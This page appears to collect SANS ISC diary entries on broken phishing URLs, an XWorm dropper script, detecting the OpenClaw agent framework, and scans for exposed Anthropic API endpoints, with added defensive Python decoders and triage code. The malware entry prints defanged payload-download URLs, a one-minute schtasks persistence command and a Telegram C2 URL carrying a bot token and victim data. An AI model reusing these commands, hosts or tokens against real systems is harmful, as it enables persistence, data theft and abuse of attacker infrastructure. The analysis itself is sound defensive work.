Diaries

Published: 2026-02-05

Broken Phishing URLs

For a few days, many of the phishing emails landing in my mailbox have contained strange URLs. They are classic lures asking you to open a document, verify your pending emails, …

But the format of the URLs is broken! In a URL, parameters are extra pieces of information added after a question mark (?) to give a website more details about a request. By convention they are written as name=value pairs (for example “email=user@domain”), and multiple parameters are separated by an ampersand (&).

Here are some examples of detected URLs:

hxxps://cooha0720[.]7407cyan[.]workers[.]dev/?dC=handlers@isc[.]sans[.]edu&*(Df
hxxps://calcec7[.]61minimal[.]workers[.]dev/?wia=handlers@isc[.]sans[.]edu&*(chgd
hxxps://couraol-02717[.]netlify[.]app/?dP=handlers@isc[.]sans[.]edu&*(TemP
hxxps://shiny-lab-a6ef[.]tcvtxt[.]workers[.]dev/?kpv=handlers@isc[.]sans[.]edu&*(lIi

You can see that the last parameter is broken: “&*(Df” is not a name=value pair. Strictly speaking, the URL is still valid (characters such as “*” and “(” are allowed in a query string by RFC 3986; the name=value layout is a convention inherited from HTML forms, not part of the URL syntax), so browsers send the query exactly as written and the malicious website is visited. A typical server-side parser sees “*(Df” as a key with an empty value and simply ignores it.

I had not seen this for a while, but it seems that the technique is back on stage. Threat actors use it to break security controls, many of which assume a “key=value” format. It may also break regex-based detection, URL normalization routines or IOC extraction pipelines…

Of course, we can track such URLs using a regex to extract the last param:

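The regex used in the diary is not reproduced on this page. The following is an added example (my own code, not the diary author's): it parses each URL the way a server-side framework would, flags any value-less parameter whose key falls outside the usual key alphabet, pulls out the last “&”-delimited chunk with a regex, and recovers the victim address carried in the first parameter. The sample set below reuses the defanged URLs above (refanged in code) plus one constructed benign URL as a control; the key-alphabet pattern is an assumption you should tune to your own traffic.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Sample input: the defanged URLs from the diary plus a constructed benign control
SAMPLE_URLS = [
    "hxxps://cooha0720[.]7407cyan[.]workers[.]dev/?dC=handlers@isc[.]sans[.]edu&*(Df",
    "hxxps://calcec7[.]61minimal[.]workers[.]dev/?wia=handlers@isc[.]sans[.]edu&*(chgd",
    "hxxps://couraol-02717[.]netlify[.]app/?dP=handlers@isc[.]sans[.]edu&*(TemP",
    "hxxps://shiny-lab-a6ef[.]tcvtxt[.]workers[.]dev/?kpv=handlers@isc[.]sans[.]edu&*(lIi",
    "https://example.com/login?email=user@example.com&token=abc123",  # constructed control
]

# Assumption: legitimate query keys use letters, digits, '_', '.', '-' and brackets
KEY_CHARS_RE = re.compile(r"^[A-Za-z0-9_.\-\[\]]+$")
# Last '&'-separated chunk of the query (the "last param" the diary refers to)
LAST_CHUNK_RE = re.compile(r"[?&]([^&#]*)$")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def refang(url: str) -> str:
    """Turn a defanged IOC (hxxp, [.]) back into a parseable URL."""
    return url.replace("hxxps://", "https://").replace("hxxp://", "http://").replace("[.]", ".")


def last_chunk(url: str) -> str:
    """Regex view: whatever follows the last '&' (or the '?' if there is only one chunk)."""
    m = LAST_CHUNK_RE.search(url.split("#", 1)[0])
    return m.group(1) if m else ""


def analyze(url: str) -> dict:
    """Parser view: split the query into pairs and flag keys that carry no value and odd characters."""
    parts = urlsplit(url)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    junk = [k for k, v in pairs if v == "" and not KEY_CHARS_RE.match(k)]
    emails = [v for _, v in pairs if EMAIL_RE.fullmatch(v)]
    return {
        "host": parts.hostname,
        "junk_params": junk,
        "emails": emails,
        "last_chunk": last_chunk(url),
        "suspicious": bool(junk),
    }


def scan(urls: list[str]) -> list[dict]:
    """Return the analysis of every URL that carries a junk parameter."""
    results = [analyze(refang(u)) for u in urls]
    return [r for r in results if r["suspicious"]]


if __name__ == "__main__":
    for r in scan(SAMPLE_URLS):
        print(f"{r['host']}: junk={r['junk_params']} target={r['emails']}")
```

The parser view is the one to trust for detection: a regex on the raw string tells you what the last chunk looks like, but `parse_qsl` shows what a web framework would actually hand to the application, which is what the attacker is counting on.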

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

1 Comments

Published: 2026-02-04

Malicious Script Delivering More Maliciousness

Today, I received an interesting email with a malicious attachment. According to the automatic scan results, it looked like a malicious script that builds a Chrome injector to steal data. Because infostealers are very common these days, it looked “legit”, but something was different. The .bat file looks like a fork of the one found in many GitHub repositories[1].

When the regular script completes, it jumps to :EndScript:

goto :EndScript

A call to :show_msgbox was added at the script end:

:EndScript
endlocal
call :show_msgbox
exit /b

Then, the magic begins. A payload is obfuscated with junk characters:

A very common technique: the string is polluted with junk characters. It is a chunk of Base64-encoded data that is executed through PowerShell:

It fetches a payload from hxxps://uniworldrivercruises-co[.]uk/optimized_MSI.png. This is a real picture:

But there is some “fun” at the end. The next payload is delimited (and extracted) using the tags “BaseStart-” and “-BaseEnd”:
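To show how the two tricks described above fit together (junk characters mixed into Base64 data, and a second stage carved out of an image file between the “BaseStart-” and “-BaseEnd” tags), here is an added example of my own, not code from the diary or from the malware: it carves the delimited blob out of a file, strips anything outside the Base64 alphabet, repairs the padding and decodes. The sample image is constructed inline (a PNG signature, filler bytes and a harmless placeholder string as the “stage”); the assumption that the junk characters fall outside the Base64 alphabet mirrors the non-hex junk the diary's own decoder removes.

```python
import base64
import re

START_TAG, END_TAG = b"BaseStart-", b"-BaseEnd"

# Assumption: junk is anything outside the Base64 alphabet (plus '=' padding)
B64_JUNK_RE = re.compile(rb"[^A-Za-z0-9+/=]")


def carve_between(blob: bytes, start: bytes = START_TAG, end: bytes = END_TAG) -> bytes:
    """Return the bytes between the first start tag and the next end tag."""
    i = blob.find(start)
    if i < 0:
        raise ValueError(f"start tag {start!r} not found")
    i += len(start)
    j = blob.find(end, i)
    if j < 0:
        raise ValueError(f"end tag {end!r} not found")
    return blob[i:j]


def decode_junked_base64(data: bytes) -> bytes:
    """Strip junk characters, fix the padding and decode strictly."""
    cleaned = B64_JUNK_RE.sub(b"", data)
    cleaned += b"=" * (-len(cleaned) % 4)  # Base64 length must be a multiple of 4
    return base64.b64decode(cleaned, validate=True)


def extract_stage(blob: bytes) -> bytes:
    """Carve the delimited blob out of the downloaded file and decode it."""
    return decode_junked_base64(carve_between(blob))


# --- Constructed sample (not the real optimized_MSI.png) -------------------
def build_sample(stage: bytes, junk: bytes = b"#!~") -> bytes:
    """Fake PNG + delimited Base64 with one junk byte inserted after every 3 chars."""
    b64 = base64.b64encode(stage)
    chunks = [b64[i:i + 3] + junk[(i // 3) % len(junk):(i // 3) % len(junk) + 1]
              for i in range(0, len(b64), 3)]
    polluted = b"".join(chunks)
    return (b"\x89PNG\r\n\x1a\n" + b"\x00" * 64      # image signature + filler
            + START_TAG + polluted + END_TAG + b"\x00" * 8)


PLACEHOLDER_STAGE = b"Write-Host 'stage two placeholder'"  # harmless stand-in
SAMPLE = build_sample(PLACEHOLDER_STAGE)

if __name__ == "__main__":
    print(extract_stage(SAMPLE))
```

Decoding with `validate=True` is deliberate: if the cleanup regex misses a junk character the decoder fails loudly instead of silently producing a corrupt stage, which is the failure mode you want when triaging an unknown sample.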

It’s shellcode invoked with the following parameters:

'==gN1V3dl5UQy8SZslmZvkGch9SbvNmLulWYyRGblhXaw9yL6MHc0RHa','0','C:\Users\Public\Downloads\','VHkaJZD8Iq','appidtel','1','appidtel','1','hxxp://178[.]16[.]53[.]209/buildingmoney.txt','C:\Users\Public\Downloads\','VHkaJZD8Iq','bat','1','0','4spTcCaYQA','0','','',''

The URL points to another payload. When I tried to decode it (the string was reversed and, once cleaned, hex-encoded), I could not decode it automatically because there were weird (non-hex) characters in the string. Thanks to ChatGPT, I decoded it with the following piece of Python script:

from pathlib import Path
import re
import binascii

input_file = Path("payload.txt")   # the downloaded buildingmoney.txt
output_file = Path("payload.bin")

raw = input_file.read_bytes()
# The blob is text with junk mixed in; drop anything that is not ASCII
ascii_data = raw.decode("ascii", errors="ignore")

# Keep only hex characters!! Everything else is junk inserted by the attacker
clean_hex = re.sub(r"[^0-9a-fA-F]", "", ascii_data)
if len(clean_hex) % 2 != 0:
    raise ValueError("Odd-length hex string after cleanup")

# The hex string was stored reversed: flip it back before decoding
clean_hex = clean_hex[::-1]
binary = binascii.unhexlify(clean_hex)
output_file.write_bytes(binary)

print(f"[+] Decoded {len(binary)} bytes to {output_file}")

The decoded payload (SHA256: d99318c9b254b4fa5bf6f1dd15996dd50be0676dd84e822503fd273316eb9ba7) is a .NET program. It implements persistence through a scheduled task:

"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "Chromiumx2" /tr "C:\Users\admin\AppData\Roaming\Chromiumx2.exe"
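A scheduled task that fires every minute from a user-writable directory is a strong persistence tell. The following is an added example (my own detection logic, not part of the diary): it tokenizes a schtasks.exe command line as it would appear in a process-creation log, parses the switches, and scores the ones that matter for triage. The sample lines below are the command line from the sample above plus a constructed benign one; the list of value-taking switches and the user-writable directory pattern are assumptions to adjust for your environment.

```python
import re
from typing import Optional

# Assumption: schtasks.exe switches that take a value (subset of /create syntax)
VALUE_SWITCHES = {"/sc", "/mo", "/tn", "/tr", "/ru", "/rp", "/st", "/sd", "/ed",
                  "/ri", "/du", "/d", "/m", "/i", "/xml", "/rl", "/s", "/u", "/p",
                  "/delay", "/k"}

# Assumption: directories a standard user can write to
USER_WRITABLE_RE = re.compile(
    r"\\(?:AppData|Users\\Public|ProgramData|Temp|Downloads)\\", re.IGNORECASE)


def tokenize(cmdline: str) -> list[str]:
    """Split a Windows command line on whitespace, keeping quoted strings whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_schtasks(cmdline: str) -> dict:
    """Separate value-taking switches from bare flags; tokens[0] is the executable."""
    tokens = tokenize(cmdline)
    args, flags = {}, set()
    i = 1
    while i < len(tokens):
        tok = tokens[i].lower()
        if tok in VALUE_SWITCHES and i + 1 < len(tokens):
            args[tok] = tokens[i + 1]
            i += 2
        else:
            if tok.startswith("/"):
                flags.add(tok)
            i += 1
    return {"args": args, "flags": flags}


def interval_minutes(sc: Optional[str], mo: Optional[str]) -> Optional[int]:
    """Repeat interval for minute/hourly schedules; None for everything else."""
    if sc is None:
        return None
    n = int(mo) if mo and mo.isdigit() else 1
    return {"minute": n, "hourly": 60 * n}.get(sc.lower())


def triage_schtasks(cmdline: str) -> dict:
    """Score a schtasks command line; two or more reasons mark it suspicious."""
    parsed = parse_schtasks(cmdline)
    args, flags = parsed["args"], parsed["flags"]
    reasons = []
    sc = args.get("/sc", "")
    every = interval_minutes(args.get("/sc"), args.get("/mo"))
    if every is not None and every <= 5:
        reasons.append(f"runs every {every} minute(s)")
    if sc.lower() in {"onlogon", "onstart"}:
        reasons.append("logon/boot trigger")
    command = args.get("/tr", "")
    if USER_WRITABLE_RE.search(command):
        reasons.append("task command lives in a user-writable directory")
    if "/f" in flags:
        reasons.append("/f silently overwrites an existing task")
    return {
        "task_name": args.get("/tn"),
        "command": command,
        "interval_minutes": every,
        "reasons": reasons,
        "suspicious": len(reasons) >= 2,
    }


# Sample log lines: the XWorm task from the diary and a constructed benign task
XWORM_CMD = r'"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "Chromiumx2" /tr "C:\Users\admin\AppData\Roaming\Chromiumx2.exe"'
BENIGN_CMD = r'schtasks.exe /create /sc daily /st 03:00 /tn "NightlyBackup" /tr "C:\Program Files\Backup\backup.exe"'

if __name__ == "__main__":
    for line in (XWORM_CMD, BENIGN_CMD):
        print(triage_schtasks(line))
```

Pairing the interval with the path is what keeps the rule quiet: plenty of legitimate software registers frequent tasks, and plenty runs from ProgramData, but a one-minute trigger pointing into AppData\Roaming, created with /f, is rarely anything but malware re-asserting itself.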

And it uses Telegram as C2:

hxxps://api[.]telegram[.]org/bot7409572452:AAGp8Ak5bqZu2IkEdggJaz2mnMYRTkTjv-U/sendMessage?chat_id=6870183115&text=%E2%98%A0%20%5BXWorm%20V7.0%20@XCoderTools%5D%0D%0A%0D%0ANew%20CLient%20:%20%0D%0ACAECEB6F4379122BA468%0D%0A%0D%0AUserName%20:%20admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20AMD%20Ryzen%205%203500%206-Core%20Processor%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%205.99%20GB%0D%0AGroup%20:%20XWorm%20V7.1

It's another XWorm sample! An interesting way to drop the trojan from yet another malicious script...

[1] https://github.com/00nx/Chrome-App-Bound-Encryption-Bypass/blob/main/make.bat

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

0 Comments

Published: 2026-02-03

Detecting and Monitoring OpenClaw (clawdbot, moltbot)

Last week, a new AI agent framework was introduced to automate "live". It targets office work in particular, focusing on messaging and interacting with systems. The tool has gone viral not so much because of its features, which are similar to those of other agent frameworks, but because of a stream of security oversights in its design.

If you are looking to detect the use of OpenClaw in your environment, Knostic has created scripts to detect it and, if you do want to use OpenClaw, to collect telemetry about its use.

openclaw-detect https://github.com/knostic/openclaw-detect

This script searches the system for filenames commonly associated with OpenClaw, for example the state directory ~/.openclaw, or for a Docker container running openclaw. If you have decent endpoint monitoring, this tool may not be needed, but it can give you some hints about which files to look for.
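As an added illustration of the kind of check such a script performs (my own code, not Knostic's openclaw-detect), the block below looks for the ~/.openclaw state directory, for a running container whose name or image mentions the tool, and for a matching process. Only the ~/.openclaw location comes from the text above; the name pattern (including the project's former names clawdbot and moltbot), the `docker ps` and `ps` invocations, and the sample command outputs are assumptions constructed for the example.

```python
import re
import subprocess
from pathlib import Path
from typing import Optional

STATE_DIR_NAMES = (".openclaw",)  # from the diary; add others as you learn them
# Assumption: the tool shows up under its current or former names
NAME_RE = re.compile(r"openclaw|clawdbot|moltbot", re.IGNORECASE)


def check_home(home: str) -> list[str]:
    """Report state directories present under a user's home directory."""
    return [f"state directory present: {Path(home) / d}"
            for d in STATE_DIR_NAMES if (Path(home) / d).is_dir()]


def check_docker_ps(output: str) -> list[str]:
    """Parse `docker ps --format '{{.Names}}\\t{{.Image}}'` output."""
    findings = []
    for line in output.splitlines():
        name, _, image = line.strip().partition("\t")
        if name and (NAME_RE.search(name) or NAME_RE.search(image)):
            findings.append(f"container {name} from image {image}")
    return findings


def check_process_list(output: str) -> list[str]:
    """Parse `ps -eo pid=,args=` output (one 'pid command...' line per process)."""
    findings = []
    for line in output.splitlines():
        parts = line.strip().split(None, 1)
        if len(parts) == 2 and NAME_RE.search(parts[1]):
            findings.append(f"process {parts[0]}: {parts[1]}")
    return findings


def scan(home: str, docker_ps_output: str, ps_output: str) -> list[str]:
    """Combine all three checks over already-collected inputs (testable offline)."""
    return check_home(home) + check_docker_ps(docker_ps_output) + check_process_list(ps_output)


def _run(cmd: list[str]) -> str:
    """Run a command and return stdout; missing tools are treated as empty output."""
    try:
        return subprocess.run(cmd, capture_output=True, text=True, timeout=10).stdout
    except (FileNotFoundError, subprocess.SubprocessError):
        return ""


def live_scan(home: Optional[str] = None) -> list[str]:
    """Collect the inputs from the running system and scan them."""
    home = home or str(Path.home())
    return scan(home,
                _run(["docker", "ps", "--format", "{{.Names}}\t{{.Image}}"]),
                _run(["ps", "-eo", "pid=,args="]))


# Constructed sample outputs (not captured from a real host)
SAMPLE_DOCKER_PS = "proud_fox\tnginx:1.27\nopenclaw-gateway\tghcr.io/example/openclaw:latest\n"
SAMPLE_PS = ("  812 /usr/lib/systemd/systemd --user\n"
             " 4021 node /home/alice/.openclaw/bin/openclaw gateway\n")

if __name__ == "__main__":
    for f in live_scan():
        print("[!]", f)
```

Keeping the parsing separate from the collection (`scan` versus `live_scan`) lets you run the same logic over command output gathered by an EDR or a fleet-wide script, which is usually how this check gets deployed in practice.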

openclaw-telemetry https://github.com/knostic/openclaw-telemetry

If you do run OpenClaw, openclaw-telemetry adds meaningful logging. The tool captures "every tool call, LLM request, and agent session — with built-in redaction, tamper-proof hash chains, syslog/SIEM forwarding, and rate limiting". It is an OpenClaw plugin and installs like any other OpenClaw plugin.

There are also a few additional security tools and tips:

--
Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu

2 Comments

Published: 2026-02-02

Scanning for exposed Anthropic Models

Yesterday, a single IP address (%%ip:204.76.203.210%%) scanned a number of our sensors for what looks like an Anthropic API node. The IP address is known to be a Tor exit node.

The requests are pretty simple:

GET /anthropic/v1/models
Host: 67.171.182.193:8000
X-Api-Key: password
Anthropic-Version: 2023-06-01

It looks like this is scanning for locally hosted Anthropic models, but it is not clear to me whether this would be successful. If anyone has any insights, please let me know. The API key is a value commonly used in documentation, not a key that anybody would expect to work.

At the same time, we are also seeing a small increase in requests for "/v1/messages". These requests have been more common in the past, and the URL may be associated with Anthropic (it is, however, somewhat generic, and other APIs likely use the same endpoint). These requests originate from %%ip:154.83.103.179%%, an IP address with a somewhat complex geolocation and routing footprint.
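To turn the two observations above into something a honeypot or web log pipeline can act on, here is an added example (my own code, not ISC's sensor logic): it parses a raw HTTP request, matches the path against a short list of LLM API endpoints, notes the vendor hints (an /anthropic/ prefix or an Anthropic-Version header) and flags credentials that are documentation placeholders rather than real keys. The probe sample mirrors the request shown above with a TEST-NET host; the other samples, the endpoint list and the placeholder-key list beyond "password" are constructed assumptions.

```python
# Assumption: endpoints worth tagging; "/v1/messages" is also used by non-LLM services
LLM_API_PATHS = {
    "/v1/models": "model listing (OpenAI- and Anthropic-style)",
    "/v1/messages": "Anthropic Messages API (path also used elsewhere)",
    "/v1/complete": "Anthropic legacy Text Completions",
    "/v1/chat/completions": "OpenAI Chat Completions",
}
# "password" is the key seen in the probe; the rest are assumed documentation values
PLACEHOLDER_KEYS = {"password", "changeme", "test", "your_api_key", "my-api-key"}


def parse_request(raw: str) -> dict:
    """Minimal parser for a raw request: request line plus headers (HTTP version optional)."""
    lines = raw.strip("\r\n").splitlines()
    parts = lines[0].split()
    if len(parts) < 2:
        raise ValueError("malformed request line")
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # end of headers
        key, sep, value = line.partition(":")
        if sep:
            headers[key.strip().lower()] = value.strip()
    return {"method": parts[0].upper(), "path": parts[1].split("?", 1)[0], "headers": headers}


def classify(raw: str) -> dict:
    """Tag a request as an LLM API probe and note vendor and credential hints."""
    req = parse_request(raw)
    path = req["path"].rstrip("/").lower() or "/"
    headers = req["headers"]
    matched = next((p for p in LLM_API_PATHS if path.endswith(p)), None)
    vendor = "anthropic" if ("anthropic-version" in headers or "/anthropic/" in path) else None
    creds = [v for k, v in headers.items() if k in ("x-api-key", "authorization")]
    placeholder = any(c.lower().removeprefix("bearer ").strip() in PLACEHOLDER_KEYS for c in creds)
    return {
        "method": req["method"],
        "path": path,
        "api": LLM_API_PATHS.get(matched),
        "vendor": vendor,
        "placeholder_credential": placeholder,
        "llm_probe": matched is not None,
    }


# Constructed samples: the first mirrors the diary's probe (host replaced by TEST-NET)
PROBE = """GET /anthropic/v1/models HTTP/1.1
Host: 192.0.2.10:8000
X-Api-Key: password
Anthropic-Version: 2023-06-01

"""
MESSAGES = "POST /v1/messages HTTP/1.1\nHost: 192.0.2.10\nAuthorization: Bearer changeme\n\n{}"
BENIGN = "GET /index.html HTTP/1.1\nHost: 192.0.2.10\n\n"

if __name__ == "__main__":
    for sample in (PROBE, MESSAGES, BENIGN):
        print(classify(sample))
```

Matching on the path suffix rather than the full path is intentional: gateways that multiplex several providers commonly prefix the vendor name (as in /anthropic/v1/models), so an exact-match list would miss precisely the deployments a scanner like this one is after.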

--
Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu

1 Comments